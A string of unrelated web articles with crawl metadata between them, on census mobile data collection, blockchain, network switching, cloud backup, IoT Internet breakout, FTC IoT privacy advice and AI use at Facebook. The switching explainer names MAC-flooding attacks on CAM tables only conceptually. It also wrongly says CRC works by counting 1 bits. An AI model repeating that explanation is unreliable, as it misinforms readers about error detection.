The task of optimizing mobile application performance will be a significant undertaking, which is why the 2016 census tests serve as the gateway to a full digital transition for 2020. Using technology and optimized networks will reduce the ramifications of congestion, latency and loss of information.
Mobile data collection and the shift to online methods for collecting data is projected to maximize efficiency, while potentially saving the federal government millions of dollars. As the Census Bureau works toward these goals, it may face challenges as a result of collecting data through mobile platforms.
The Right Way for Mobile Data Collection
The transition to using mobile technology will be a huge feat for the Census Bureau. To ensure high levels of accuracy and precision in the way data is tracked and stored, wide-area network, or WAN, verification is an absolute must.
In the 2016 census trials, 225,000 households in each testing location are participating. Incorporating WAN verification and optimization into the tests allows mobile applications to perform at a high level, while also enabling activity to occur in multiple places simultaneously. Optimization delivers the critical ability to pinpoint the clearest path from the data center using a wireless signal within a network, which makes it one of the most efficient processes for mobile data collection.
The Census Bureau chose to launch the tests in the Houston and Los Angeles metropolitan areas for a number of reasons, but noted the varying levels of internet usage as a key determining factor. Securing the census network is crucial, as field workers that are using mobile technology to collect data must have a combination of online and offline capabilities.
Security will be a key issue, as a recent survey found that 89 percent of federal IT leaders worry about data security at remote office locations and the Census 2020 will involve hundreds upon hundreds of those locations to collect the vast amount of data needed.
Foreshadowing Census 2020
If the 2016 census tests are successful, the use of mobile technology and online networks will be the new mode of collecting and saving census data moving forward. It is a critical time for the Census Bureau, which must prove these new technologies can withstand the onslaught of data it will face during Census 2020.
Census 2020 could mark a turning point for data collection by the federal government, if done properly.
For example, optimized networks would lead to a census questionnaire being completed in the field and data being sent 20 times faster than non-optimized networks — that is the equivalent of flying from New York to Los Angeles compared to driving. Essentially, that is what Census is trying to accomplish by removing the need to stop at every home in the country.
As the private sector increases its reliance on mobile data and technology, it is only expected that the federal government will follow suit. The current Census 2020 tests are the latest reflection of this mobile transition and its results will have far-reaching implications. | <urn:uuid:2b5a8026-be24-4c04-bf60-a1bc344bab7f> | CC-MAIN-2024-38 | https://develop.fedscoop.com/putting-census-2020-to-the-test/ | 2024-09-20T11:19:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00428.warc.gz | en | 0.937903 | 989 | 2.984375 | 3 |
On April 3rd, GDT Network Engineer Ryan Rogers presented, as part of the GDT DevOps team’s weekly Lunch & Learn series, information about blockchain. As defined by Investopedia, blockchain is a digitized, decentralized, public ledger of all cryptocurrency transactions. Ryan uses Bitcoin as the marquee, certainly most noteworthy, implementation of the blockchain algorithm. He begins with a simple definition of blocks, and what can be stored within them. He discusses both the benefits and drawbacks of distributed blockchains, referred to as a Distributed Ledger. Ryan concludes the presentation with a summary of the data structure, hashing, and the power of distribution. There’s a great Q & A session at the end that includes information on use cases, scalability, and the drawbacks of blockchain. Give it a watch–great info! | <urn:uuid:4978adad-2525-48e6-87db-cf65c5e0c018> | CC-MAIN-2024-38 | https://gdt.com/category-resources/gdt-presents-lunch-learn-on-blockchain/ | 2024-09-10T16:39:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00428.warc.gz | en | 0.932452 | 169 | 2.8125 | 3 |
A network switch is a networking device used to connect devices together on a computer network, using a form of packet switching to forward data to the destination device. A switch is considered more advanced than a hub because it forwards a message only to the one or more devices that need to receive it, rather than broadcasting the same message out of every one of its ports. Here is some background that is useful for understanding Cisco switches:
A network switch is a multi-port network bridge that processes and forwards data at the data link layer (layer 2) of the OSI model. Some switches also incorporate routing in addition to bridging; these switches are commonly known as layer-3 or multilayer switches. Switches exist for various types of networks, including Fibre Channel, Asynchronous Transfer Mode (ATM) and Ethernet, among others.
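The learning-and-forwarding behavior that makes a switch smarter than a hub can be sketched in a few lines of Python. This is an illustrative model of a generic transparent bridge, not any vendor's implementation; the port numbers and MAC strings are invented.

```python
# Toy transparent bridge: learn source MACs per port, forward known unicast
# out one port, flood unknown unicast and broadcast out all other ports.

class LearningSwitch:
    BROADCAST = "ff:ff:ff:ff:ff:ff"

    def __init__(self, num_ports):
        self.ports = list(range(num_ports))
        self.mac_table = {}                  # MAC address -> port last seen on

    def receive(self, in_port, src_mac, dst_mac):
        """Return the list of ports the frame is forwarded out of."""
        self.mac_table[src_mac] = in_port    # learn/refresh the source's port
        if dst_mac != self.BROADCAST and dst_mac in self.mac_table:
            out_port = self.mac_table[dst_mac]
            return [] if out_port == in_port else [out_port]   # filter/forward
        return [p for p in self.ports if p != in_port]         # flood

switch = LearningSwitch(4)
print(switch.receive(0, "aa", "bb"))   # "bb" unknown -> flood: [1, 2, 3]
print(switch.receive(1, "bb", "aa"))   # "aa" learned on port 0 -> [0]
```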
A collision domain is a section of a network where data packets can collide with one another while being sent on a shared medium or through repeaters, particularly when using early versions of Ethernet. A network collision occurs when more than one device attempts to send a packet on a network segment at the same time. Collisions are resolved using carrier-sense multiple access with collision detection (CSMA/CD), in which the competing packets are discarded and re-sent one at a time. This becomes a source of inefficiency in the network. Only one device in the collision domain may transmit at any one time; the other devices in the domain listen to the network in order to avoid data collisions. Because only one device may transmit at a time, total network bandwidth is shared among all devices. Collisions also decrease network efficiency: if two devices transmit simultaneously, a collision occurs, and both devices must retransmit at a later time.

Since data bits propagate at a finite speed, "simultaneously" has to be defined in terms of the size of the collision domain and the minimum allowed packet size. With a smaller minimum packet size, or a larger domain diameter, a sender could finish sending a packet before its first bits had reached the most remote node. That node could then start sending as well, with no sign of a transmission already in progress, destroying the original packet. Unless the size of the collision domain allows the initial sender to receive the second transmission (the collision) within the time it takes to send the packet, the sender can neither detect the collision nor repeat the transmission; this is known as a late collision.
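The size/packet-length trade-off above can be made concrete with the classic 10 Mb/s Ethernet numbers. The 64-byte minimum frame and a propagation speed of roughly 2×10^8 m/s are assumptions of this back-of-the-envelope sketch; real standards impose tighter diameter limits once repeater delays are counted.

```python
# Back-of-the-envelope slot-time calculation for classic 10 Mb/s Ethernet.

bit_rate = 10e6                        # 10 Mb/s
min_frame_bits = 64 * 8                # 64-byte minimum frame = 512 bits
slot_time = min_frame_bits / bit_rate  # time to send the minimum frame (s)
print(slot_time * 1e6)                 # slot time in microseconds (~51.2)

# A collision must reach the sender before it finishes the minimum frame,
# so the round-trip propagation delay must fit in the slot time; one way
# may take at most half of it.
prop_speed = 2e8                       # m/s, assumed signal speed in copper
max_diameter = prop_speed * (slot_time / 2)
print(max_diameter / 1000)             # rough upper bound in km (~5.12)
```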
Collision domains are found in hub or repeater environments, where each host segment connects to a hub and the whole arrangement represents a single collision domain within one broadcast domain. Collision domains are also found in other shared-medium networks, such as wireless networks like Wi-Fi. Modern wired networks use a network switch to eliminate collisions: by connecting each device directly to a port on the switch, either each port becomes its own collision domain (in the case of half-duplex links) or the possibility of collisions is eliminated entirely (in the case of full-duplex links).
A broadcast domain is a logical division of a computer network in which all nodes can reach each other by broadcast at the data link layer. A broadcast domain can be within the same LAN segment or bridged to other LAN segments. In terms of current popular technologies: any computer connected to the same Ethernet repeater or switch is a member of the same broadcast domain, as is any computer connected to the same set of interconnected switches and repeaters. Routers and other higher-layer devices form boundaries between broadcast domains. Contrast this with a collision domain, which would be all the nodes on the same set of interconnected repeaters, divided by switches and learning bridges. Collision domains are generally smaller than, and contained within, broadcast domains. While some layer-2 devices can divide collision domains, broadcast domains are only divided by layer-3 devices such as routers or layer-3 switches. Separating a network into VLANs divides broadcast domains as well, but provides no means to route between them without layer-3 functionality. The distinction between broadcast and collision domains arises because simple Ethernet and similar systems use a shared transmission medium. In simple Ethernet (without switches or bridges), data frames are transmitted to all other nodes on the network; each receiving node checks the destination address of each frame and simply ignores any frame not addressed to its own MAC.
Switches act as buffers, receiving and analyzing the frames from each connected network segment. Frames destined for nodes on the originating segment are not forwarded by the switch; frames destined for a specific node on a different segment are forwarded only to that segment. Only broadcast frames are forwarded to all other segments. This reduces unnecessary traffic and collisions.
In such a switched network, transmitted frames may not be received by all other reachable nodes; nominally, only broadcast frames are received by all nodes. Collisions are confined to the network segment on which they occur. Thus, the broadcast domain is the entire interconnected layer-2 network, while the segments connected to each switch or bridge port each form their own collision domain. Not all network systems or media feature broadcast and collision domains; point-to-point PPP links, for example, do not.
Both store-and-forward and cut-through layer-2 switches base their forwarding decisions on the destination MAC address of data packets. They also learn MAC addresses as they examine the source MAC (SMAC) fields of packets while stations communicate with other nodes on the network.
When a layer-2 Ethernet switch makes its forwarding decision, the series of steps it goes through to determine whether to forward or drop a packet is what differentiates the cut-through method from its store-and-forward counterpart. While a store-and-forward switch makes a forwarding decision only after it has received the whole frame and checked its integrity, a cut-through switch engages in the forwarding process soon after it has examined the destination MAC (DMAC) address of an incoming frame. In theory, a cut-through switch receives and examines only the first 6 bytes of a frame, which carry the DMAC address. In practice, however, cut-through switches wait until a few more bytes of the frame have been evaluated before deciding whether to forward or drop the packet.
In store-and-forward switching, the LAN switch copies each complete frame into its memory buffers and computes a cyclic redundancy check (CRC) for errors. CRC is an error-checking technique that uses a mathematical formula, based on the number of bits (1s) in the frame, to determine whether the frame is damaged. If a CRC error is found, the frame is discarded; if the frame is error-free, the switch forwards it out the appropriate interface port.
Store-and-forward switching waits until the entire frame has arrived before forwarding it, holding the whole frame in memory. Once the frame is in memory, the switch checks the destination address, source address and CRC. If no errors are present, the frame is forwarded to the appropriate port. This process ensures that the destination network is not affected by corrupted or truncated frames.
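The store-and-forward decision can be sketched with a CRC-32 check over a simplified frame layout. Real Ethernet computes a 4-byte frame check sequence over the whole frame in hardware; this toy version only illustrates the buffer-verify-forward sequence:

```python
import zlib

def make_frame(payload: bytes) -> bytes:
    # Simplified frame: payload followed by a 4-byte CRC-32 checksum.
    crc = zlib.crc32(payload)
    return payload + crc.to_bytes(4, "big")

def store_and_forward(frame: bytes):
    """Buffer the whole frame, verify its checksum, then forward or drop."""
    payload, received_crc = frame[:-4], int.from_bytes(frame[-4:], "big")
    if zlib.crc32(payload) != received_crc:
        return None  # CRC error: discard the frame
    return payload   # error-free: forward out the appropriate port

good = make_frame(b"hello switch")
bad = bytearray(good)
bad[0] ^= 0xFF  # flip bits to simulate corruption in transit

print(store_and_forward(good))        # forwarded payload
print(store_and_forward(bytes(bad)))  # None: dropped
```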
With cut-through switching, the LAN switch copies into its memory only the destination MAC address, which is located in the first 6 bytes of the frame following the preamble. The switch looks up the destination MAC address in its switching table, determines the outgoing interface port, and forwards the frame on to its destination through the designated switch port. A cut-through switch reduces latency because it begins to forward the frame as soon as it reads the destination MAC address and determines the outgoing switch port. The difference from store-and-forward is that store-and-forward receives the whole frame before forwarding. Since frame errors cannot be detected by reading only the destination address, cut-through switching may hurt network performance by forwarding corrupted or truncated frames. These bad frames can create broadcast storms in which several devices on the network respond to the corrupted frames at the same time.
In cut-through switching, frames with and without errors are forwarded, leaving error detection to the intended recipient. If the receiving device determines the frame is corrupted, the frame is simply discarded. Cut-through switches perform no error checking of the frame, because the switch looks only for the frame's destination MAC address and forwards the frame out the appropriate switch port. Cut-through switching therefore yields low switch latency. The drawback is that bad data frames, as well as good ones, are forwarded to their destinations. At first this may not sound serious, because most network cards perform their own frame checking by default to ensure good data is received. If your network is broken down into workgroups, the likelihood of bad frames or collisions may be minimized, making cut-through switching a reasonable choice for your network.
An Ethernet switch's role is to copy Ethernet frames from one port to another. The presence of a CAM table is one attribute that separates a switch from a hub: without a functional CAM table, all frames received by a network switch would be echoed back out to all other ports, much like an Ethernet hub. A switch should only emit a frame on the port where the destination device resides (unicast), unless the frame is for all nodes on the switch (broadcast) or for multiple nodes (multicast). The CAM table is a memory structure used by the switch logic to map the Media Access Control (MAC) addresses of stations to the ports on which they connect to the switch. This allows switches to facilitate communications between connected stations at high speed regardless of how many devices are connected to the switch. The CAM table is consulted to make the frame-forwarding decision. Switches learn MAC addresses from the source address of Ethernet frames arriving on their ports, for example from Address Resolution Protocol response packets. CAM tables are frequently the target of layer-2 attacks on a local network, used to set up man-in-the-middle attacks. A threat agent that controls a device connected to an Ethernet switch can attack the switch's CAM table. This attack generally exploits a weakness in switch design that appears when the switch runs out of space to record all of the MAC-address-to-port mappings it learns: if the table fills up due to MAC flooding, most switches are no longer able to reliably add new MAC addresses.
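The learning, flooding and table-exhaustion behaviour described above can be sketched as follows. The port count and CAM-table limit are arbitrary illustration values:

```python
class LearningSwitch:
    """Toy layer-2 switch: learns source MACs, floods unknown destinations.
    A small CAM table limit illustrates why MAC flooding attacks work."""

    def __init__(self, num_ports, cam_limit=4):
        self.num_ports = num_ports
        self.cam = {}            # MAC address -> port
        self.cam_limit = cam_limit

    def handle_frame(self, in_port, src_mac, dst_mac):
        # Learn the sender's port, unless the CAM table is already full.
        if src_mac in self.cam or len(self.cam) < self.cam_limit:
            self.cam[src_mac] = in_port
        # Forward: known unicast goes to one port, everything else floods.
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]
        return [p for p in range(self.num_ports) if p != in_port]

sw = LearningSwitch(num_ports=4, cam_limit=2)
print(sw.handle_frame(0, "aa", "bb"))  # unknown destination: flood to [1, 2, 3]
print(sw.handle_frame(1, "bb", "aa"))  # "aa" already learned: forward to [0]
sw.handle_frame(2, "cc", "aa")         # CAM table full: "cc" cannot be learned
print("cc" in sw.cam)                  # False, so traffic to "cc" keeps flooding
```

The last two lines show the MAC-flooding weakness in miniature: once the table is full, new stations are never learned, and frames addressed to them are flooded out every port where an attacker can sniff them.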
Reading through all of this shows how important a switch is. Understanding the many functions a switch performs, from separating collision and broadcast domains to choosing between store-and-forward and cut-through forwarding, helps you understand how networks work and how to use them more effectively.
Importance of Cloud-Based Data Backup
The deluge of digital data in today’s digital economy is unprecedented. Cloud-based data backup creates an opportunity to support both fast disaster recovery and business continuity for organizations of all sizes.
In a study conducted by IDC and commissioned by EMC, digitally created data was projected to reach an astounding 40,000 exabytes by 2020, equivalent to 40 trillion gigabytes, or over 5,200 gigabytes for every man, woman and child.
Not all digital data are created equal. Some are meant to be kept for a long period of time, while others are short-lived. For instance, the General Data Protection Regulation (GDPR), a European Union (EU) law scheduled to take effect on May 25, 2018, requires EU and non-EU organizations that offer goods or services to EU residents, or monitor their behavior, to delete data that no longer serves its original purpose or when the affected individuals withdraw their consent for their data to be processed.
While some data might be short-lived, their sensitive nature still necessitates that they should be protected similar to long-term data.
3-2-1 Data Backup Rule
Backing up important and sensitive data isn't just an option for an organization; it's a necessity. Digital data by its very nature is susceptible to loss and corruption, and one or two backups aren't enough. The accepted practice for data backup is the 3-2-1 rule: keep 3 copies of important digital data, on 2 different media types, with 1 copy offsite.
Rule 3: Keep 3 Copies of Any Important File
This means that your organization needs to keep 1 primary and 2 backups of important digital data. Three copies of digital data ensure that in case the original and even the first backup are lost or corrupted, your organization still has another copy to turn to.
A primary copy can be stored on your organization's in-house servers; one backup copy can be stored on a separate in-house server, and the other backup offsite or in the cloud.
Rule 2: Use 2 Different Media Types to Backup Files
The rule requires that backups need to be in two different formats. Different media types offer different protection. The reasoning behind 2 different media types is that it’s never a good idea to “put all eggs in one basket”.
There are a number of media types to which your organization can back up important digital files, and the offsite copy described in the next rule counts as a different media type.
Rule 1: Store 1 Copy Offsite
The chances of losing your organization’s important data as a result of in-house hazards such as hardware failure, software failure and natural disasters (flooding, earthquakes and storms) can’t be ignored. Thus, it’s essential to store important digital files offsite. The best way to store digital files offsite is through the cloud.
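The full 3-2-1 workflow can be sketched end to end in Python. The directory names below stand in for real media, and `fake_cloud_upload` is a placeholder for a real provider SDK call (for example boto3's `upload_file` for S3); both are assumptions for illustration, not part of the rule itself:

```python
import shutil
import tempfile
from pathlib import Path

def backup_3_2_1(source: Path, second_media: Path, offsite_upload):
    """3 copies of a file: the original, one on a second medium, one offsite."""
    local_backup = second_media / source.name
    shutil.copy2(source, local_backup)        # copy 2: a different media type
    offsite_copy = offsite_upload(source)     # copy 3: offsite / cloud
    return [source, local_backup, offsite_copy]

# Demo: temporary directories stand in for the primary disk, a NAS and the cloud.
work = Path(tempfile.mkdtemp())
for name in ("primary", "nas", "cloud"):
    (work / name).mkdir()
important = work / "primary" / "ledger.db"
important.write_text("critical records")

def fake_cloud_upload(path: Path) -> Path:
    # Placeholder for a real provider call, e.g. boto3's upload_file.
    dest = work / "cloud" / path.name
    shutil.copy2(path, dest)
    return dest

copies = backup_3_2_1(important, work / "nas", fake_cloud_upload)
print([c.read_text() for c in copies])  # three identical copies
```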
Cloud backup, also known as online backup, is the process of backing up data by sending via the internet a copy of important digital data to an offsite server.
An offsite server is typically hosted by a third-party service provider. Amazon Simple Storage Service (S3), Microsoft OneDrive and IDrive are examples of third-party offsite server providers. These providers usually charge customers a fee based on the number of users, storage capacity and bandwidth.
Pros of Cloud Backup
Here are some of the advantages of a cloud backup:
- Defense against Worst-Case Scenarios
Having a cloud backup will protect your organization against some of the worst-case scenarios that might happen onsite, including critical failures of onsite computers due to malicious software (malware) and natural disasters.
- Location Independent
With cloud backup, data can be retrieved anytime, regardless of your location, so long as you’ve got an internet connection.
- No Need to Invest in Hardware and Software
With cloud backup, there’s no need to invest in hardware and software.
- Regulatory Compliance
Some third-party offsite server providers can ensure regulatory compliance in handling your organization's sensitive data (it's important to know that not all of them comply with regulations), an assurance that many small organizations can benefit from.
Cons of Cloud Backup
Here are some of the disadvantages of cloud backup:
- Internet Intermittence
Internet connection and volume of data can affect the sending and retrieval of data backup to and from the third-party offsite server service provider. Delay in sending and retrieving data backup is an acknowledged hazard for cloud backup. This time lag demands that only the important or sensitive data needs to be backed up in the cloud.
- Lack of Control
With cloud backup, your organization has little or no information at all about the service provider’s cloud infrastructure. Your organization, in essence, surrenders most of the control over the data backup.
Cloud Backup Security
Considering that your organization will have no control over the data backed up in the cloud, it’s essential to choose the right third-party offsite server service provider.
Here are some tips on choosing the right cloud storage service provider and ensuring cloud backup security:
- Prior to entrusting your organization’s critical data to a cloud service provider, carefully examine its service agreement regarding security practices.
- Look for a cloud service provider that’ll encrypt your organization’s data following established encryption algorithms. Encryption – the process of converting digital data into a code – makes it harder for attackers to gain access to sensitive data.
- Send and retrieve sensitive data to and from the cloud only via a secure internet connection.
- Follow established network security practices, including the use of firewalls.
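The client-side encryption tip above can be illustrated as follows. This is a deliberately simplified toy cipher for demonstration only; production code should use a vetted library (for example AES-GCM via the `cryptography` package), never a hand-rolled construction like this one:

```python
import hashlib
import secrets

def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Derive a pseudo-random byte stream from key + nonce (toy construction)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def toy_encrypt(data: bytes, key: bytes) -> bytes:
    # Fresh random nonce per message, prepended to the ciphertext.
    nonce = secrets.token_bytes(16)
    body = bytes(d ^ s for d, s in zip(data, _keystream(key, nonce, len(data))))
    return nonce + body

def toy_decrypt(blob: bytes, key: bytes) -> bytes:
    nonce, body = blob[:16], blob[16:]
    return bytes(d ^ s for d, s in zip(body, _keystream(key, nonce, len(body))))

key = secrets.token_bytes(32)
ciphertext = toy_encrypt(b"customer list", key)   # encrypt BEFORE uploading
print(toy_decrypt(ciphertext, key))               # b'customer list'
```

The point of the sketch is the workflow, not the cipher: data is encrypted on your side with a key the provider never sees, so even a compromised cloud account exposes only ciphertext.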
Protecting important and sensitive data is critical to your organization’s survival. Storing important data inside your organization’s office is simply not enough. Important and sensitive data needs to be stored in the cloud as well.
At GenX, we offer data storage management services, including:
- One-time installation of all required hardware and software
- Varied data storage solutions, such as cloud-based backup systems
- Centralizing backup systems, for more reliable and streamlined services
- Offsite storage of sensitive information to protect against data loss due to office hardware damage
- Thorough testing of backup and storage procedures for ensured reliability of disaster protocols
- Continued technical support through our GenX helpdesk services | <urn:uuid:603347f1-719e-438c-b3d7-12c85f047974> | CC-MAIN-2024-38 | https://www.genx.ca/importance-cloud-based-data-backup | 2024-09-12T00:11:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00328.warc.gz | en | 0.918752 | 1,353 | 2.515625 | 3 |
Quick definition: An Internet breakout is the point at which data passes from a private network to the public Internet.
An Internet breakout may be your local Wi-Fi router at home, or the gateway in front of your IoT sensors. In a cellular network, the Internet breakout is the point where data leaves the operator's network. For local networks such as Wi-Fi or Bluetooth, the breakout is usually at the location of the device itself; for cellular networks, the breakout is in a central location belonging to the home operator, the one that sold the SIM card.
This creates significant challenges for organizations with globally distributed devices, as data may have to be transported across multiple countries or even continents to pass through a centralized datacenter of the home operator before it can start traveling to its destination.
It’s kind of like if you were trying to mail a letter to your neighbor, and the carrier had to transport the envelope to a shipping center across the globe before delivering it. It would be absurd. But some organizations get stuck in a similar process with their data.
Thankfully, just as there’s a much more efficient way to deliver the mail, there’s a much more efficient way to handle Internet breakout and transport data.
Internet breakout and cloud computing
When devices are close to the operator's datacenter, such as within a single country, a centralized Internet breakout model doesn't inhibit performance or slow down data transfers. But companies with distributed devices that access the Internet from locations scattered all over the world will be affected by packet loss and longer latency. These organizations need a decentralized model that allows devices to deliver data along the shortest path to the application the customer accesses, without transferring data along circuitous routes.
These organizations usually plan a distributed application infrastructure to optimize data transfer in their customer markets. While only some organizations can afford to expand their infrastructure and build additional datacenters to streamline data transport across the world, the advent of cloud computing and the wealth of cloud service providers available today mean that even small businesses can afford a distributed infrastructure they don't have to build and buy themselves.
Cloud computing enables companies to pay for access to datacenters located around the world, allowing them to move application servers closer to their endpoints and reduce the time it takes to transmit and receive data. Home routing by mobile network operators, however, stands in the way of that benefit.
Local Internet breakout
Local Internet breakout is when a distributed network uses local Internet Service Providers (ISPs) to place Internet access points closer to end users. By routing data through the local ISP, the network can exchange data between devices much more quickly.
Regional Internet breakout
Regional Internet breakout is when a distributed network routes data through regional data centers, typically through a major cloud service provider like Amazon AWS, Microsoft Azure, or Google Cloud.
emnify uses AWS to facilitate dynamic regional Internet breakout, where emnify dynamically selects the closest breakout region based on a device’s location - and at the same time uses other availability zones as backups to prevent downtime.
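Dynamic region selection of this kind can be sketched as a nearest-region lookup. The region names and coordinates below are illustrative placeholders, not emnify's or AWS's actual topology:

```python
from math import asin, cos, radians, sin, sqrt

# Illustrative breakout regions (lat, lon) - not an actual provider list.
REGIONS = {
    "eu-west-1":      (53.35, -6.26),   # Dublin
    "us-east-1":      (38.95, -77.45),  # N. Virginia
    "ap-southeast-1": (1.35, 103.82),   # Singapore
}

def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))

def closest_region(device_pos):
    """Pick the breakout region nearest to the device's reported position."""
    return min(REGIONS, key=lambda r: haversine_km(device_pos, REGIONS[r]))

print(closest_region((52.52, 13.40)))   # Berlin -> eu-west-1
print(closest_region((35.68, 139.69)))  # Tokyo  -> ap-southeast-1
```

A production system would combine this kind of proximity choice with health checks, falling back to another availability zone when the nearest one is down.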
While traditional MNOs route your data through their own centralized server, whether you’re in-network or roaming, emnify brings the data closer to your distributed servers. Your devices stay connected anywhere in the world, and everywhere you deploy, your customers enjoy the same low-latency connectivity.
Internet breakout data regulation and security
One of the biggest challenges with home routing and centralized Internet breakout is data-processing regulation and security. The problem with a centralized Internet breakout model is that data may travel to continents your customers do not allow it to go, and it takes long routes over the public internet.
But that’s not the case with emnify. Our cloud native platform keeps the customer data local and brings the same secure connectivity to every deployment, protecting your IoT devices with specialized IoT SIM cards, IMEI locks, connectivity profiles, network firewalls, VPN capabilities, and more.
Take your IoT connectivity global
emnify is an IoT communication platform that leverages cellular technology to connect your devices to more than 540 networks in over 180 countries. Wherever you deploy, emnify routes your data through dynamic regional Internet breakouts, keeping your connections both fast and secure. See how emnify's IoT connectivity works.
IoT security and privacy best practices
In a report on the Internet of Things (IoT), the staff of the Federal Trade Commission recommend a series of concrete steps that businesses can take to enhance and protect consumers’ privacy and security, as Americans start to reap the benefits from a growing world of Internet-connected devices.
The IoT is already impacting the daily lives of millions of Americans through the adoption of health and fitness monitors, home security devices, connected cars and household appliances, among other applications. Such devices offer the potential for improved health-monitoring, safer highways, and more efficient home energy use, among other potential benefits. However, the FTC report also notes that connected devices raise numerous privacy and security concerns that could undermine consumer confidence.
The IoT universe is expanding quickly, and there are now over 25 billion connected devices in use worldwide, with that number set to rise significantly as consumer goods companies, auto manufacturers, healthcare providers, and other businesses continue to invest in connected devices, according to data cited in the report.
Security was one of the main topics addressed at the workshop and in the comments, particularly due to the highly networked nature of the devices. The report includes the following recommendations for companies developing Internet of Things devices:
- build security into devices at the outset, rather than as an afterthought in the design process
- train employees about the importance of security, and ensure that security is managed at an appropriate level in the organization
- ensure that when outside service providers are hired, that those providers are capable of maintaining reasonable security, and provide reasonable oversight of the providers
- when a security risk is identified, consider a “defense-in-depth” strategy whereby multiple layers of security may be used to defend against a particular risk
- consider measures to keep unauthorized users from accessing a consumer’s device, data, or personal information stored on the network
- monitor connected devices throughout their expected life cycle, and where feasible, provide security patches to cover known risks.
Commission staff also recommend that companies consider data minimization – that is, limiting the collection of consumer data, and retaining that information only for a set period of time, and not indefinitely. The report notes that data minimization addresses two key privacy risks: first, the risk that a company with a large store of consumer data will become a more enticing target for data thieves or hackers, and second, that consumer data will be used in ways contrary to consumers’ expectations.
The report takes a flexible approach to data minimization. Under the recommendations, companies can choose to collect no data, data limited to the categories required to provide the service offered by the device, less sensitive data; or choose to de-identify the data collected.
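As a sketch of what these minimization options can look like in code (the field names, hashing scheme and 90-day window below are invented for illustration, and a truncated hash alone is not full de-identification):

```python
import hashlib
from datetime import datetime, timedelta, timezone

RETENTION = timedelta(days=90)                           # illustrative window
ALLOWED_FIELDS = {"steps", "heart_rate", "recorded_at"}  # only what the service needs

def minimize(record: dict) -> dict:
    """Keep only the required fields and pseudonymize the user identifier."""
    kept = {k: v for k, v in record.items() if k in ALLOWED_FIELDS}
    # One-way hash in place of the raw id (a pseudonym, not full anonymization).
    kept["user"] = hashlib.sha256(record["user_id"].encode()).hexdigest()[:12]
    return kept

def purge_expired(records, now=None):
    """Drop records older than the retention window instead of keeping them forever."""
    now = now or datetime.now(timezone.utc)
    return [r for r in records if now - r["recorded_at"] <= RETENTION]

raw = {
    "user_id": "alice@example.com",
    "home_address": "12 Main St",   # sensitive and unneeded: never stored
    "steps": 8042,
    "heart_rate": 61,
    "recorded_at": datetime.now(timezone.utc),
}
stored = minimize(raw)
print(sorted(stored))  # ['heart_rate', 'recorded_at', 'steps', 'user']
```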
Eve Maler, VP Innovation & Emerging Technology at ForgeRock, comments: “The problem with focusing primarily on security by design is that the overarching fear of IoT security has only a little bit to do with hacking and the physical nature of hacking constrained devices. The bigger fear has more to do with feeling like there is very little power, from an end-user perspective, to control what information is sharable. It’s as though companies are automatically granted access to consumers’ personal data by virtue of their privileged position, vs. consumers controlling the information that is sharable.”
“The rise of distributed services and devices with cloud components only increase consumers’ agitation for more transparency, choice and control. Therefore, the designers of IoT-enabled devices must recognize the solid business value of privacy-respecting features. The most practical way to build in privacy is to use consistent, well-vetted open standards and platforms that enable secure, user-consented connections between devices, services and applications. Once consumers feel that they have control over their information, we will truly see the full potential of connected devices, services and applications,” Maler added. | <urn:uuid:cc1e765e-331f-409f-94ac-0e6b23021508> | CC-MAIN-2024-38 | https://www.helpnetsecurity.com/2015/01/28/iot-security-and-privacy-best-practices/ | 2024-09-16T18:22:46Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00828.warc.gz | en | 0.943434 | 796 | 2.765625 | 3 |
But AI is now an integral part of many of the technology services which we all use on a daily basis.
And this is possible only because of changes to enterprise technology architecture in the last few years.
Big businesses have for the most part done the work of linking up isolated siloes of data. They’ve created integrated data and storage facilities and built platforms which allow technology like Hadoop to access fluid pools of enterprise data.
The creation of these infrastructures is allowing different kinds of software to emerge.
The results of this are already visible in social networking, online shopping, media and search.
We are already interacting with AI systems dozens of times a day, and not just while we're online: if you drove to work this morning, even if your car is not self-driving yet, you probably shared the road with a car that was at least partly AI-driven.
The traffic lights and the buses are likewise already relying on AI to improve service.
Back at your computer autocomplete forms and search requests use some form of AI.
The recommended stories at the end of news pieces are created by AI software, though often not very good AI software.
Likewise online retailers recommended products have moved beyond comparing purchases with other shoppers’ baskets to more targeted suggestions.
AI also plays a big part in the software used to scan and sort product reviews and removing fake, or ‘astroturf’, comments.
But some media companies are using artificial intelligence to actually write stories too. These systems do best with fairly structured data sets, such as weather forecasts and company financial reports, but they also do a pretty good job with baseball games.
The stories produced are generally well received by readers although research shows humans still have a slight edge on ‘readability’ compared to the computer generated copy.
The hope is that this won’t just replace reporters but add to what they do by reducing time spent on some of the simple but time consuming tasks.
It also opens up the creation of written records – one start-up is using the technology to create match reports for school and kids’ sports teams based on game data.
Facebook is a relative latecomer to AI but is now racing ahead and attempting to include it in almost all new products.
After using such systems for facial recognition, and for checking log-ins from unexpected places AI is now playing a growing role at the company.
The most widespread use of AI tools has been to improve delivery of sponsored posts or adverts. It uses systems to pre-judge likely interest in adverts it shows to improve relevance and therefore click-through rates. It is even piloting technology to scan user posts to identify people at risk of suicide and suggesting organisations they can contact for help.
When company founder Mark Zuckerberg wrote an open letter to users on the issue of fake news last month he promised that AI would play a big role in making the community safer and content more trustworthy.
In fact the network already uses a serious amount of AI, one leading engineer said it could not function without it.
The network uses intelligent systems to trawl through content, images and video posted by users and highlight content it finds worrying. This system now accounts for over 30 per cent of total complaints received.
Zuckerberg stressed that these systems are still in the early stages and it still faces difficulties. Telling the difference between stories about terrorism and stories promoting terrorism is tricky for a human never mind a machine.
Zuckerberg noted that polarisation of opinion pre-dates social networking and has even had an impact on debates around AI itself.
